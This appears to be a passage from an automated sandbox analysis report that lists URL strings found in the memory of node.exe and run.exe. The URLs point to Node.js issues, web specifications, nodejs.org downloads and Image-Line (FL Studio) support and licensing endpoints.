Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://github.com/nodejs/node-v0.x-archive/issues/2876.
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://github.com/nodejs/node/commit/ec2822adaad76b126b5cccdeaa1addf2376c9aa6
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://github.com/nodejs/node/commit/f7620fb96d339f704932f9bb9a0dceb9952df2d4
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://github.com/nodejs/node/issues
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/10673
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/13435
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/2006
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/2119
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/3392
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/12342
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/12607
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/13870#discussion_r124515293
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/1771#issuecomment-119351671
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/21313
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/26334.
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/30380#issuecomment-552948364
Source: node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/30958
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/3394
Source: node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/34375
Source: node.exe, 0000000F.00000003.2238679421.0000000037EC0000.00000004.00001000.00020000.00000000.sdmp, node.exe, 0000000F.00000003.2232924754.00000000061C0000.00000004.00001000.00020000.00000000.sdmp, node.exe, 00000017.00000003.2236055808.0000000004395000.00000004.00000020.00020000.00000000.sdmp, node.exe, 00000017.00000002.2260929722.000000000E9C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/sindresorhus/got)
Source: node.exe, 0000000F.00000002.2925133957.000000001BA00000.00000004.00001000.00020000.00000000.sdmp, node.exe, 00000017.00000002.2260929722.000000000E9C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/sindresorhus/got)9
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://github.com/standard-things/esm/issues/821.
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://github.com/tc39/ecma262/issues/1209
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://github.com/tc39/proposal-ses/blob/e5271cc42a257a05dcae2fd94713ed2f46c08620/shim/src/freeze.j
Source: node.exe, 0000000F.00000002.2913751697.0000000001801000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 0000000F.00000002.2922785102.0000000004240000.00000004.00001000.00020000.00000000.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2263968941.000000002C540000.00000004.00001000.00020000.00000000.sdmp, node.exe, 00000017.00000002.2240618921.0000000001801000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://github.com/v8/v8/blob/d6ead37d265d7215cf9c5f768f279e21bd170212/src/js/prologue.js#L152-L156
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://goo.gl/t5IS6M).
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://heycam.github.io/webidl/#define-the-operations
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://heycam.github.io/webidl/#dfn-class-string
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://heycam.github.io/webidl/#dfn-default-iterator-object
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://heycam.github.io/webidl/#dfn-iterator-prototype-object
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-interfaces
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-iterable
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-iterable-entries
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-iterators
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-namespaces
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-operations
Source: node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-stringifier
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/browsers.html#ascii-serialisation-of-an-origin
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/browsers.html#concept-origin-opaque
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/timers-and-user-prompts.html#dom-setinterval
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/webappapis.html#windoworworkerglobalscope
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://invisible-island.net/ncurses/terminfo.ti.html#toc-_Specials
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://invisible-island.net/xterm/ctlseqs/ctlseqs.html
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://linux.die.net/man/1/dircolors).
Source: node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://mathiasbynens.be/notes/javascript-encoding
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://no-color.org/
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://nodejs.org/
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://nodejs.org/api/cli.html#cli_unhandled_rejections_mode).
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://nodejs.org/api/fs.html
Source: node.exe, 0000001E.00000002.2323547377.0000000013D1A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/download/release/
Source: node.exe, 00000017.00000002.2261157825.0000000021DE2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/download/release/t
Source: node.exe, 0000001E.00000002.2323547377.0000000013D1A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/download/release/v12.22.12/node-v12.22.12-headers.tar.gz
Source: node.exe, 0000000F.00000002.2925861243.000000003AA40000.00000004.00001000.00020000.00000000.sdmp, node.exe, 00000017.00000002.2265085240.0000000033440000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/download/release/v12.22.12/node-v12.22.12-headers.tar.gze
Source: node.exe, 00000017.00000002.2265085240.0000000033440000.00000004.00001000.00020000.00000000.sdmp, node.exe, 00000017.00000002.2261157825.0000000021DE2000.00000004.00001000.00020000.00000000.sdmp, node.exe, 0000001E.00000002.2323547377.0000000013D1A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/download/release/v12.22.12/node-v12.22.12.tar.gz
Source: node.exe, 00000017.00000002.2261157825.0000000021DE2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/download/release/v12.22.12/node-v12.22.12.tar.gzd
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://nodejs.org/download/release/v12.22.12/node-v12.22.12.tar.gzhttps://nodejs.org/download/relea
Source: node.exe, 0000001E.00000002.2323547377.0000000013D1A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/download/release/v12.22.12/node-v12.22.12.tar.gzh~
Source: node.exe, 0000000F.00000002.2921222937.0000000001F88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/download/release/v12.22.12/node-v12.22.12.tar.gzk
Source: node.exe, 0000001E.00000002.2323547377.0000000013D1A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/download/release/v12.22.12/win-x86/node.lib
Source: node.exe, 0000000F.00000002.2921222937.0000000001F88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/download/release/v12.22.12/win-x86/node.lib)
Source: node.exe, 0000000F.00000003.2238553183.0000000032CA2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/download/release/v12.22.12/win-x86/node.libLy
Source: node.exe, 00000017.00000002.2265085240.0000000033440000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/download/release/v12.22.12/win-x86/node.libUP
Source: node.exe, 00000017.00000002.2243108049.0000000002114000.00000004.00000020.00020000.00000000.sdmp, node.exe, 00000017.00000003.2240105506.000000000210F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/download/release/v12.22.12/win-x86/node.libfr
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://nodejs.org/en/docs/inspector
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://nodejs.org/en/docs/inspectorFor
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://nodejs.org/static/images/favicons/favicon.ico
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://nodejs.org/static/images/favicons/favicon.icodevtoolsFrontendUrldevtoolsFrontendUrlCompatweb
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://sourcemaps.info/spec.html
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://stackoverflow.com/a/5501711/3561
Source: run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://streamer.image-line.com
Source: run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://streamer.image-line.com/stream/download?
Source: run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.image-line.com/
Source: run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.image-line.com/action/knowledgebase/?ans=655
Source: run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.image-line.com/action/license/serial?serial=%s
Source: run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.image-line.com/action/redirect/FLStudioAuthentication?username=%s&password=%s&flags=
Source: run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.image-line.com/api.php?call=product_description_inapp&callback=il_product_descriptio
Source: run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.image-line.com/jshop/
Source: run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.image-line.com/jshop/?ord=%s
Source: run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.image-line.com/member/regcode.php?inapp=1UH
Source: run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.image-line.com/member/regfile_unlock.php?username=%s&password=%s&checksum=%s&flags=%
Source: run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.image-line.com/redirect/
Source: run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.image-line.com/redirect/FLStudio%sHelp
Source: run.exe, 00000002.00000003.1768566979.000001981A9C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.image-line.com/redirect/FLStudio_TrialExit%d
Source: run.exe, 00000002.00000003.1768566979.000001981A9C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.image-line.com/redirect/NewVersionNewsImage?image=/newversion.jpg
Source: run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.image-line.com/redirect/contentlib
Source: run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.image-line.com/redirect/downloadnewsrss
Source: run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.image-line.com/redirect/downloadversionsxml
Source: run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.image-line.com/redirect/me
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://tc39.es/ecma262/#sec-IsHTMLDDA-internal-slot
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-%iteratorprototype%-object
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-%typedarray%.of
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-object.prototype.tostring
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2397#section-2
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3492#section-3.4
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3986#section-3.2.2
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7230#section-3.2.2
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7230#section-3.2.6
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7540#section-8.1.2.5
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://url.spec.whatwg.org/#cannot-have-a-username-password-port
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-url
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-url-origin
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-byte-serializer
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-parser
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-serializer
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://url.spec.whatwg.org/#url
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://url.spec.whatwg.org/#urlsearchparams
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://url.spec.whatwg.org/#urlsearchparams-stringification-behavior
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://w3c.github.io/webappsec-subresource-integrity/#the-integrity-attribute
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://wiki.squid-cache.org/SquidFaq/InnerWorkings#What_is_a_half-closed_filedescriptor.3F
Source: node.exe, 0000000F.00000002.2923728743.00000000043EE000.00000004.00000020.00020000.00000000.sdmp, node.exe, 0000000F.00000003.2451444266.00000000042D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.catcert.net/verarrel
Source: node.exe, 0000000F.00000002.2922964130.00000000042D7000.00000004.00000020.00020000.00000000.sdmp, node.exe, 0000000F.00000002.2923728743.00000000043EE000.00000004.00000020.00020000.00000000.sdmp, node.exe, 0000000F.00000003.2451444266.00000000042D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.catcert.net/verarrel05
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-line-terminators
Source: node.exe, 0000000F.00000002.2913751697.0000000001801000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 0000000F.00000002.2922785102.0000000004240000.00000004.00001000.00020000.00000000.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2263968941.000000002C540000.00000004.00001000.00020000.00000000.sdmp, node.exe, 00000017.00000002.2240618921.0000000001801000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-promise.all
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-timeclip
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/5.1/#sec-15.1.3.4
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Alternative
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Atom
